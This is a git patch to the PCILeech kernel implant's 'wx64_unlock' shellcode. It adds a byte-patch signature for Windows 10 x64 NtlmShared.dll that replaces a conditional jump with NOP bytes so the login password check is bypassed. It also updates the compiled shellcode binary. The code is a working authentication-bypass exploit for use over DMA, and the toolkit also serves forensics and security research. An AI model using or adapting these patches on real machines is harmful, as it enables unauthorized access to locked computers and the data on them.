From c996dc1bcad98aeb4252497bad46f040ca515d4b Mon Sep 17 00:00:00 2001 From: ufrisk Date: Mon, 15 Aug 2016 23:16:31 +0200 Subject: [PATCH] implant: add unlock signature [wx64_unlock] --- pcileech_files/wx64_unlock.ksh | Bin 1965 -> 2029 bytes pcileech_shellcode/wx64_unlock.c | 7 ++++++- 2 files changed, 6 insertions(+), 1 deletion(-) diff --git a/pcileech_files/wx64_unlock.ksh b/pcileech_files/wx64_unlock.ksh index 247063d12b958b5c1edaab49cc18e8349b4d054b..c62843a3892e9cfdb54a1c7bfe18912a2a67dfd5 100644 GIT binary patch delta 293 zcmZ3>|CZm@T=*ItoY2Dq^g~{)(IL(Kz)#gts%cy~s?enUMhk*x4ZT zB2fsPGSN|aVgL(Ym`C>)kLD*IJeuDqyqG?*XcdzN%Var5Pq7sqjc*Kqx{VJUcTq98 z&&u-Oqc`-!<`7e6;nClto z3s#xs*&F#lmx+5D8{1QP%Qt8^m( delta 228 zcmaFMzn0(DT=#jkH$9wK;6a%j=QKB z+-GI^@6j82VR9{F*ye|fjEsC~$6b$1V0f|c@Bjb*Lmy05WNtBj;nV%VqxC?Eo=>lj ziUClY0?1Ow9SlHYJbHaEcywQQ5d{?S?7r&ReWv@v|IiPUZ!l|fTq5+U@|w0 R%w!FgKa44xRas9k0RT1QS7rbJ diff --git a/pcileech_shellcode/wx64_unlock.c b/pcileech_shellcode/wx64_unlock.c index 921b5aa..34ca07e 100644 --- a/pcileech_shellcode/wx64_unlock.c +++ b/pcileech_shellcode/wx64_unlock.c @@ -129,7 +129,7 @@ NTSTATUS Unlock_FindAndPatch(_In_ PKERNEL_FUNCTIONS2 fnk2, _Inout_ PBYTE pbPages return E_FAIL; } -#define NUMBER_OF_SIGNATURES 5 +#define NUMBER_OF_SIGNATURES 6 NTSTATUS Unlock(_In_ QWORD qwAddrNtosBase) { SIGNATURE oSigs[NUMBER_OF_SIGNATURES] = { @@ -157,6 +157,11 @@ NTSTATUS Unlock(_In_ QWORD qwAddrNtosBase) { .cbOffset = 0x62f,.cb = 4,.pb = { 0xff, 0x15, 0xb3, 0x1b } }, { .cbOffset = 0x638,.cb = 4,.pb = { 0x0f, 0x85, 0x18, 0xfb } }, { .cbOffset = 0x638,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } } + }, + { .chunk = { // win10x64 NtlmShared.dll (2016-07-16::10.0.14393.0) + { .cbOffset = 0x6df,.cb = 4,.pb = { 0xff, 0x15, 0xd3, 0x1b } }, + { .cbOffset = 0x6e8,.cb = 4,.pb = { 0x0f, 0x85, 0x18, 0xfb } }, + { .cbOffset = 0x6e8,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } } } }; KERNEL_FUNCTIONS2 fnk2;